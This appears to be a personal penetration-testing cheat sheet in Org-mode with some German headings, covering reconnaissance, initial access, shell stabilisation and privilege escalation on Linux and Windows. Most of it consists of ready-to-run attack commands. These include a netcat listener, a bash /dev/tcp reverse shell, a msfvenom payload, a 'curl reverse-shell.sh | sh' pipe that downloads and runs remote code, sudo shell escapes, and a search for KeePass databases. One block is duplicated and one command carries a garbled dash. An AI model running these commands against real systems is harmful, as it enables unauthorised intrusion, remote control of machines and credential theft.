**** to install: - magic wormhole - tldr - rlwrap - #+BEGIN_SRC bash sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap #+END_SRC **** for keyring -> if there is some kind of keyring error #+BEGIN_SRC bash sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg #+END_SRC * information gathering *** nmap for quick scan of available ips #+BEGIN_SRC bash nmap -sn ip/24 #+END_SRC to filter output for open ips #+BEGIN_SRC bash nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt #+END_SRC scan open ports: #+BEGIN_SRC bash nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155 #+END_SRC *** dirb #+BEGIN_SRC bash dirb http://ip #+END_SRC **** bei windows #+BEGIN_SRC bash nmap --vuln ip #+END_SRC ***** bei windows \+ smb #+BEGIN_SRC bash nmap --script smb-vuln* ip #+END_SRC * inital access *** start listener: #+BEGIN_SRC bash rlwrap -cAr nc -nlvp 9002 #+END_SRC *** reverse shell bash: #+BEGIN_SRC bash /bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1 #+END_SRC *** reverse shell file: #+BEGIN_SRC bash msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py #+END_SRC -> from revshells.com *** untested: Reverse Shell as a Service 1. On your machine: #+BEGIN_SRC bash nc -l 1337 or nlvp? #+END_SRC 2. On the target machine: #+BEGIN_SRC bash curl https://reverse-shell.sh/yourip:1337 | sh #+END_SRC **** reconnecting: #+BEGIN_SRC bash while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done #+END_SRC * privilege escalation ** always run these: #+BEGIN_SRC bash sudo -l #+END_SRC if sudo doesn't work: [[*TTY Spawn Shell]] **** check cronjobs #+BEGIN_SRC bash ls /etc/cron.* crontab -l #+END_SRC ** TTY Spawn Shell ***** if sudo still doesn't work use #+BEGIN_SRC bash sudo -S command #+END_SRC Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. *** Python spawn shell #+BEGIN_SRC bash python -c 'import pty; pty.spawn("/bin/bash")' #+END_SRC Fully Interactive TTY **** All the steps to stabilize your shell **The first step:** #+BEGIN_SRC bash python3 -c 'import pty;pty.spawn("/bin/bash")' #+END_SRC Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys. **Step two is:** #+BEGIN_SRC bash export TERM=xterm #+END_SRC This will give us access to term commands such as clear. **Finally (and most importantly) we will background the shell using** #+BEGIN_SRC bash Ctrl + Z #+END_SRC Back in our own terminal we use #+BEGIN_SRC bash stty raw -echo; fg #+END_SRC This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes #+BEGIN_SRC bash stty rows 38 columns 116 #+END_SRC *** OS system spawn shell #+BEGIN_SRC bash echo os.system("/bin/bash") #+END_SRC *** Bash spawn shell #+BEGIN_SRC bash /bin/sh -i #+END_SRC *** Perl spawn shell #+BEGIN_SRC bash perl —e 'exec "/bin/sh";' #+END_SRC *** Ruby spawn shell ruby: exec "/bin/sh" *** Lua spawn shell lua: os.execute("/bin/sh") *** IRB spawn shell exec "/bin/sh" *** VI spawn shell #+BEGIN_SRC bash :!bash #+END_SRC *** VI(2) spawn shell #+BEGIN_SRC bash :set shell=/bin/bash:shell #+END_SRC *** Nmap spawn shell #+BEGIN_SRC bash !sh #+END_SRC **** Exiftools Metadaten auslesen: #+BEGIN_SRC bash exiftool picture.png #+END_SRC Binwalk (Binary Daten exportieren): #+BEGIN_SRC bash binwalk -e picture.png #+END_SRC * Windows *** WinPEAS https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS *** LOLBAS https://lolbas-project.github.io/# *** WADCOMS https://wadcoms.github.io/ *** PrivescCheck Script as an alternative to WinPEAS https://github.com/itm4n/PrivescCheck *** RUN these while the other scripts are working #+BEGIN_SRC powershell whoami /priv whoami /all schtasks /query #+END_SRC *** for finding kbdx Files https://github.com/ivanmrsulja/keepass2john #+BEGIN_SRC powershell Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue #+END_SRC quick Wins Linux: gdb -nx -ex '!sh' -ex quit sudo mysql -e '! /bin/sh' strace -o /dev/null /bin/sh sudo awk 'BEGIN {system("/bin/sh")}' evilwinrm quick Wins Linux: gdb -nx -ex '!sh' -ex quit sudo mysql -e '! /bin/sh' strace -o /dev/null /bin/sh sudo awk 'BEGIN {system("/bin/sh")}'